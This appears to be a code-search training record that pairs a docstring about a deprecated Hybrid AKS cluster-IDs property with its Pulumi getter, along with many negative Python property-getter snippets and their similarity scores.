"def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def location(self) -> str:\n return self.metadata.location",
"def resource_type(self):\n return 'cluster'",
"def cluster(self):\n return self._cluster",
"def cluster(self):\n return self._cluster",
"def location(self):\n self.manager.refresh_client()\n return self.content[\"location\"]",
"def _course_location(self):\r\n return \"location:{org}+{number}+{run}+course+{run}\".format(**self._course_dict)",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def cluster_name(self):\n return self.name",
"def location(self):\r\n return self._get('location', {})",
"def location(self):\n return self.properties.get(\"location\", Location())",
"def location(self) -> str:\n return self._location",
"def location(self) -> str:\n\t\tind = self._raw_result['locationIndex']\n\t\tif ind > -1 and ind < len(self._client.locations):\n\t\t\treturn self._client.locations[ind]['name']\n\t\treturn \"\"",
"def get_default_alt_loc(self):\n return self.default_alt_loc",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def default_secondary_location(self) -> str:\n return pulumi.get(self, \"default_secondary_location\")",
"def location(self):\n return self._location",
"def location(self):\n return self._location",
"def location(self) -> object:\n return self._location",
"def cluster_name(self):\n return self._data['cluster_name']",
"def Lokation(self):\n return self.getMylocation()",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def _cluster_scoped_iam_path(self):\n return f\"{IAM_ROLE_PATH}{self.stack_name}/\"",
"def location(self) -> Object:\n return self._location",
"def get_cluster_entry(self):\n\n cert_data = self.cluster_description.get(\"certificateAuthority\", {}).get(\"data\", \"\")\n endpoint = self.cluster_description.get(\"endpoint\")\n arn = self.cluster_description.get(\"arn\")\n\n return OrderedDict([\n (\"cluster\", OrderedDict([\n (\"certificate-authority-data\", cert_data),\n (\"server\", endpoint)\n ])),\n (\"name\", arn)\n ])",
"def get_location(self):\r\n return self.__location",
"def cal_location(self):\n return self.setup_location.name",
"def cluster_description(self):\n if self._cluster_description is None:\n if self._parsed_globals is None:\n client = self._session.create_client(\"eks\")\n else:\n client = self._session.create_client(\n \"eks\",\n region_name=self._parsed_globals.region,\n endpoint_url=self._parsed_globals.endpoint_url,\n verify=self._parsed_globals.verify_ssl\n )\n full_description = client.describe_cluster(name=self._cluster_name)\n self._cluster_description = full_description[\"cluster\"]\n\n if \"status\" not in self._cluster_description:\n raise EKSClusterError(\"Cluster not found\")\n if self._cluster_description[\"status\"] not in [\"ACTIVE\", \"UPDATING\"]:\n raise EKSClusterError(\"Cluster status is {0}\".format(\n self._cluster_description[\"status\"]\n ))\n\n return self._cluster_description",
"def get_location(self):\n\t\treturn self.location",
"def __str__(self):\n return \"Cluster\"",
"def get_location(self):\r\n return None",
"def locate(self):\n return utils.get_object(\"crds\", self.observatory, \"locate\")",
"def get_location(self):\n return self._overridden_location or self.get_default_location()",
"def get_location(self):\n return self.location",
"def locations(self):\r\n return resource.Location(self)",
"def location(self) -> Optional[str]:\n raise NotImplementedError()",
"def cluster_id(self):\n return self._cluster_id",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def get_cluster_info(self) -> Dict[str, Any]:\n pass",
"def location(self):\r\n\r\n raise SemanticError(\"Location not implemented\");",
"def cal_location(self):\n return self.location.name",
"async def location(self):\n if not hasattr(self, \"_location\"):\n self._location = await Stack.fetch_stack_value(self, \"http://usefulinc.com/ns/doap#location\", await self.uuid)\n return self._location",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self):\r\n try:\r\n return self.data['location']\r\n except KeyError:\r\n return self.data['station_name']",
"def get_cluster_name(cls):\n\n mid = Machineid()\n if mid.is_sps_cluster:\n return cls.SPS\n if mid.is_spts_cluster:\n return cls.SPTS\n if mid.is_mdfl_cluster:\n return cls.MDFL\n\n return cls.LOCAL",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def management_cluster(self) -> pulumi.Output['outputs.PrivateCloudManagementCluster']:\n return pulumi.get(self, \"management_cluster\")",
"def location(self):\n if self.scoping:\n return self.scoping.location\n else:\n return None",
"def getLocation(self):\n return self._Location",
"def location_arn(self) -> Optional[str]:\n return pulumi.get(self, \"location_arn\")",
"def get_location(self):\n return self.request({\n \"path\": \"/\" + UUID + \"/location\"\n })",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")"
] | [
"0.6552111",
"0.6507004",
"0.6507004",
"0.6427688",
"0.64267975",
"0.64260936",
"0.64260936",
"0.63151413",
"0.6296761",
"0.6123441",
"0.6123441",
"0.595561",
"0.58933264",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5868833",
"0.5868833",
"0.5868833",
"0.5862934",
"0.5843456",
"0.5832257",
"0.5774442",
"0.5670738",
"0.565388",
"0.5642064",
"0.5642064",
"0.5637912",
"0.5634472",
"0.5634472",
"0.5632768",
"0.56296843",
"0.56284314",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5592737",
"0.5577344",
"0.5573659",
"0.55710924",
"0.5565424",
"0.55634725",
"0.5558331",
"0.55544007",
"0.55512756",
"0.55403364",
"0.5537851",
"0.55323946",
"0.5517471",
"0.55100954",
"0.5498214",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54803187",
"0.5467255",
"0.5461056",
"0.5451514",
"0.5442272",
"0.5442272",
"0.5442272",
"0.5434703",
"0.54240304",
"0.541763",
"0.53864765",
"0.5384029",
"0.53797865",
"0.53771985",
"0.5368183",
"0.5366416",
"0.5366416",
"0.5366416"
] | 0.67308724 | 1 |
Field Deprecated. These fields will be empty/omitted. The list of Hybrid AKS cluster resource IDs that are associated with this L3 network. | def hybrid_aks_clusters_associated_ids(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "hybrid_aks_clusters_associated_ids") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def gateway_cluster_id_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"gateway_cluster_id_lists\")",
"def cluster_ids(self):\n return self.model.cluster_ids",
"def _get_cluster_list(self):\n return self.__cluster_list",
"def network_ids(self):\n return self._network_ids",
"def get_all_cluster_ids(self) -> Set[str]:\n return {v for v in self._clusters.values() if v}",
"def orig_cluster_id(self):\n if self.old_cluster_name is None:\n raise RuntimeError('old_cluster_name is not set')\n return self.fuel_web.client.get_cluster_id(self.old_cluster_name)",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def clusters(self,project_id=os.environ.get(\"ATLAS_PROJECT\")):\n project_id = project_id if project_id != '' else self.__project_id\n return self.get('{}/groups/{}/clusters'.format(ApiVersion.A1.value,project_id))",
"def resource_type(self):\n return 'cluster'",
"def list_cluster_response():\n return {\n \"clusters\": [\n EXAMPLE_NAME\n ]\n }",
"def cluster_list():\n request_debug(r, logger)\n json_body = r.get_json(force=True, silent=True) or {}\n result = cluster_handler.list(filter_data=json_body)\n response_ok[\"data\"] = result\n return jsonify(response_ok), CODE_OK",
"def network_fabric_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"network_fabric_ids\")",
"def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"associated_resource_ids\")",
"def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"associated_resource_ids\")",
"def clusters(self):\n\t\tif self._record is None:\n\t\t return []\n\t\tclusters = [i for i in self._record.features if i.type == 'cluster']\n\t\treturn clusters",
"def clusters(self):\n raise NotImplementedError",
"def test_list_cluster_network(self):\n pass",
"def node_ids(self):\n return [self.node_id]",
"def get_clusters(self):\r\n\r\n return self.__clusters",
"def get_cluster_by_id(self, c_id: str) -> List[str]:\n return [k for k, v in self._clusters.items() if v == c_id]",
"def cluster_id(self):\n return self._cluster_id",
"def list_namespaced_cluster_network(self, **kwargs):\n\n all_params = ['pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method list_namespaced_cluster_network\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/oapi/v1/clusternetworks'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n if 'label_selector' in params:\n query_params['labelSelector'] = params['label_selector']\n if 'field_selector' in params:\n query_params['fieldSelector'] = params['field_selector']\n if 'watch' in params:\n query_params['watch'] = params['watch']\n if 'resource_version' in params:\n query_params['resourceVersion'] = params['resource_version']\n if 'timeout_seconds' in params:\n query_params['timeoutSeconds'] = params['timeout_seconds']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ClusterNetworkList',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response",
"def get_clusters(self):\n fields = ['name', ]\n return self.get_data(\"clusters\", fields)",
"def get_clusters() -> List[List[str]]:\n all_users = get_user_ids()\n pass",
"def get_labeled_ids(self):\n with open(DATASET_LABELED_IDS) as file:\n ids = file.readlines()\n ids = [id.strip() for id in ids]\n return ids",
"def course_id_list(self):\r\n\r\n return self.q(css='article.course').attrs('id')",
"def clusters(self):\n return self._clusters",
"def security_list_ids(self):\n return self._security_list_ids",
"def network_interface_ids(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"network_interface_ids\")",
"def Clusters(self):\n return",
"def cluster_identifier(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_identifier\")",
"def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use cluster_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"cluster_ipv4_cidr is deprecated: This field is deprecated, use cluster_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"cluster_ipv4_cidr\")",
"def cluster_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cluster_id\")",
"def get_clusters(self):\n return self._clusters",
"def cluster_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_id\")",
"def get_clusters(self):\n\n return self.__clusters",
"def get_cluster_entry(self):\n\n cert_data = self.cluster_description.get(\"certificateAuthority\", {}).get(\"data\", \"\")\n endpoint = self.cluster_description.get(\"endpoint\")\n arn = self.cluster_description.get(\"arn\")\n\n return OrderedDict([\n (\"cluster\", OrderedDict([\n (\"certificate-authority-data\", cert_data),\n (\"server\", endpoint)\n ])),\n (\"name\", arn)\n ])",
"def list_coe_clusters(self):\n return list(self.container_infrastructure_management.clusters())",
"def get_ids(self):\n all_networks = []\n network_dict = {}\n for network, status in self.networks.items():\n if status[\"onboarded\"]:\n all_networks.append(\"{}\".format(network))\n network_dict[status[\"name\"]] = network\n\n self.network_ids = all_networks\n return network_dict",
"def get_cluster_id(self):\n cmd = \"svcinfo lscluster -delim :\"\n\n output = self._svc_command(cmd)[0]\n\n if len(output) != 2:\n return None\n\n header = output[0].split(':')\n values = output[1].split(':')\n index = header.index(SVC_CLUSTER_ID)\n cluster_id = values[index]\n return cluster_id",
"def get_node_ids(self):\n \n return self.node_ids",
"def build_resource_labels(self):\n response = [ \n {\n \"key\": \"instance_id\", \n \"value\": \"9113659852587170607\"\n }, \n {\n \"key\": \"project_id\", \n \"value\": \"YOUR_PROJECT_ID\"\n }, \n {\n \"key\": \"zone\", \n \"value\": \"us-east4-a\"\n }\n ]\n return response",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def test_get_hyperflex_cluster_network_policy_list(self):\n pass",
"def test_get_hyperflex_cluster_list(self):\n pass",
"def listClusters():\n return [c['name'] for c in pymongo.Connection().clovr.clusters.find()]",
"def tags(self):\n return ['HostRoles/component_name', \\\n 'HostRoles/host_name', \\\n 'HostRoles/cluster_name']",
"def test_list_cluster_role(self):\n pass",
"def list_namespaced_cluster_role(self, **kwargs):\n\n all_params = ['pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method list_namespaced_cluster_role\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/oapi/v1/clusterroles'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n if 'label_selector' in params:\n query_params['labelSelector'] = params['label_selector']\n if 'field_selector' in params:\n query_params['fieldSelector'] = params['field_selector']\n if 'watch' in params:\n query_params['watch'] = params['watch']\n if 'resource_version' in params:\n query_params['resourceVersion'] = params['resource_version']\n if 'timeout_seconds' in params:\n query_params['timeoutSeconds'] = params['timeout_seconds']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ClusterRoleList',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response",
"def list_ecs_clusters():\n clusters = ECS_MANAGER.list_ecs_clusters()\n\n print(str_sep)\n\n if clusters:\n print(\"Listing clusters ARNs available in {}\"\n .format(SESSION.region_name.upper()))\n print(str_sep)\n for arn in clusters['clusterArns']:\n print(arn)\n\n print(str_sep)",
"def cluster_nodes(self) -> ResponseT:\n return self.execute_command(\"CLUSTER NODES\")",
"def known_nodes(self) -> List[Client]:\n return list(self.in_memory_client_registry.values())",
"def watch_namespaced_cluster_network_list(self, **kwargs):\n\n all_params = ['pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method watch_namespaced_cluster_network_list\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/oapi/v1/watch/clusternetworks'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n if 'label_selector' in params:\n query_params['labelSelector'] = params['label_selector']\n if 'field_selector' in params:\n query_params['fieldSelector'] = params['field_selector']\n if 'watch' in params:\n query_params['watch'] = params['watch']\n if 'resource_version' in params:\n query_params['resourceVersion'] = params['resource_version']\n if 'timeout_seconds' in params:\n query_params['timeoutSeconds'] = params['timeout_seconds']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='JsonWatchEvent',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response",
"def network_acls(self) -> Optional['outputs.DataCollectionEndpointResponseNetworkAcls']:\n return pulumi.get(self, \"network_acls\")",
"def list_clusters(_filter=None):\n ecs_clusters = __paginate_call(ecs_client, 'list_clusters', 'clusterArns')\n if _filter:\n ecs_clusters = [cluster for cluster in ecs_clusters if _filter in cluster]\n return sorted(ecs_clusters)",
"def get_cluster_elements_labels(self):\n \n copy = deepcopy(self.cluster_elements_labels)\n return copy",
"def cluster_types(self):\n raise NotImplementedError",
"def get_cluster_elements_str(self):\n\n copy = deepcopy(self.cluster_elements_str)\n return copy",
"def cluster(self):\n return self._cluster",
"def cluster(self):\n return self._cluster",
"def get_nids(self, nodes):\n nids = []\n\n for node in nodes.values():\n try:\n hostname = Conf.get(self._index, f'cluster>{node}>hostname')\n except:\n raise MotrError(errno.EINVAL, f\"{node} hostname not found\")\n\n check_type(hostname, str, \"hostname\")\n\n if self._server_id == node:\n cmd = \"lctl list_nids\"\n else:\n cmd = (f\"ssh -o \\\"StrictHostKeyChecking=no\\\" {hostname}\"\n \" lctl list_nids\")\n op = execute_command(self, cmd)\n nids.append(op[0].rstrip(\"\\n\"))\n\n return nids",
"def identifiers(self) -> List[str]:\n raise NotImplementedError",
"def list_clusters(ctx, project_name):\n project = ctx.obj.groups.byName[project_name].get().data\n clusters = ctx.obj.groups[project.id].clusters.get()\n pprint(clusters.data)",
"def get_ids(self) -> List[str]:",
"def resource_labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"resource_labels\")",
"def cloud_ids(self):\n if self.stage == 'trainval':\n ids = self.all_cloud_ids['train'] + self.all_cloud_ids['val']\n else:\n ids = self.all_cloud_ids[self.stage]\n return sorted(list(set(ids)))",
"def ListAnnotationsForCluster(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def __str__(self):\n return \"Cluster\"",
"def security_ip_lists(self) -> pulumi.Output[Sequence[str]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def get_refresh_ids(self):\n ids = []\n for bucket in self.router.lonely_buckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids",
"def security_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def security_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def security_group_ids(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"security_group_ids\")",
"def get_clusters():\n return objects.ClusterCollection.order_by(\n objects.ClusterCollection.all(),\n 'id'\n )",
"def subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"subnet_ids\")",
"def clusters(self) -> Iterable[dto.Cluster]:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )",
"def link_ids(self):\n return self._link_ids",
"def __repr__(self):\n\n return \"<Cluster id=%s>\" % (self.id)",
"def core_network_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_arn\")",
"def netlist(self):\n return self._netlist",
"def clusters(self) -> ndarray:\n return self._clusters",
"def resource_names(self):\n return self._resource_names",
"def subnet_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:\n return pulumi.get(self, \"subnet_ids\")"
] | [
"0.68748236",
"0.6741056",
"0.6469224",
"0.58448756",
"0.5693075",
"0.5632907",
"0.56074035",
"0.56074035",
"0.56074035",
"0.56074035",
"0.56074035",
"0.5602489",
"0.55777043",
"0.55605936",
"0.5555327",
"0.55306417",
"0.55130476",
"0.55130476",
"0.55060947",
"0.5469506",
"0.54570967",
"0.544265",
"0.5441059",
"0.5417788",
"0.54071575",
"0.53971267",
"0.53602755",
"0.53188676",
"0.5297521",
"0.52798057",
"0.52638596",
"0.52589864",
"0.5250788",
"0.523533",
"0.52321106",
"0.52301383",
"0.5225441",
"0.5225441",
"0.5225441",
"0.5225441",
"0.5219824",
"0.5214521",
"0.5214521",
"0.51926345",
"0.51856536",
"0.51830727",
"0.5164489",
"0.5152405",
"0.51510185",
"0.5145161",
"0.5143226",
"0.5143226",
"0.5143226",
"0.5134375",
"0.51310194",
"0.5126028",
"0.5104401",
"0.50728184",
"0.50644374",
"0.50544655",
"0.5050569",
"0.50429744",
"0.5034171",
"0.50188214",
"0.50150734",
"0.5014696",
"0.5011176",
"0.5006724",
"0.5006229",
"0.5006229",
"0.50021666",
"0.4994703",
"0.49934614",
"0.49908924",
"0.49769872",
"0.49680382",
"0.49600264",
"0.4957831",
"0.4957831",
"0.4957831",
"0.49561772",
"0.4954215",
"0.49499175",
"0.49423066",
"0.49423066",
"0.49261513",
"0.49246362",
"0.4917164",
"0.4917164",
"0.4917164",
"0.49147078",
"0.49115527",
"0.49083775",
"0.4906985",
"0.49034274",
"0.49008778",
"0.49006087",
"0.48998994",
"0.48998994"
] | 0.5681043 | 6 |
Field Deprecated. The field was previously optional, now it will have no defined behavior and will be ignored. The indicator of whether or not to disable IPAM allocation on the network attachment definition injected into the Hybrid AKS Cluster. | def hybrid_aks_ipam_enabled(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "hybrid_aks_ipam_enabled") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def ipam_enabled(self) -> Optional[pulumi.Input[Union[str, 'L3NetworkConfigurationIpamEnabled']]]:\n return pulumi.get(self, \"ipam_enabled\")",
"def internet_advertising_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def AddNetworkFlag(parser):\n help_text = \"\"\"\\\n The VPC network from which the AlloyDB instance is accessible via private\n IP. For example, projects/myProject/global/networks/default. This setting\n cannot be updated after it is set.\n \"\"\"\n parser.add_argument('--network', help=help_text)",
"def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)",
"def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)",
"def allow_v_net_override(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_v_net_override\")",
"def allowNoIngressLabel(self):\n if self.layer != None:\n return self.layer.allowNoIngressLabel()\n return False # no layer means no restrictions",
"def publicly_advertisable(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def publicly_advertisable(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def __init__(__self__, *,\n disable_outbound_nat: Optional[pulumi.Input[bool]] = None):\n if disable_outbound_nat is not None:\n pulumi.set(__self__, \"disable_outbound_nat\", disable_outbound_nat)",
"def setDefaultCapability(self, b):\n self.defaultAllow = b",
"def allow_v_net_override(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_v_net_override\")",
"def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n ipv4_cidr_block: Optional[pulumi.Input[str]] = None,\n use_service_networking: Optional[pulumi.Input[bool]] = None):\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if ipv4_cidr_block is not None:\n pulumi.set(__self__, \"ipv4_cidr_block\", ipv4_cidr_block)\n if use_service_networking is not None:\n pulumi.set(__self__, \"use_service_networking\", use_service_networking)",
"def nfc_beam_disabled(self):\n return self._nfc_beam_disabled",
"def disable_outbound_nat(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_outbound_nat\")",
"def setAllowAnnotations(self,value):\n self.PDFreactorConfiguration.in1[\"allowAnnotations\"] = value",
"def disable_openapi_validation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_openapi_validation\")",
